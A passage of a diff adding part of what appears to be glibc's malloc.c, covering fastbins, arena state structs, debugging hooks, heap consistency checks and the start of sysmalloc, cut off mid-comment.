+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given it's sole purpose is to reduce number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
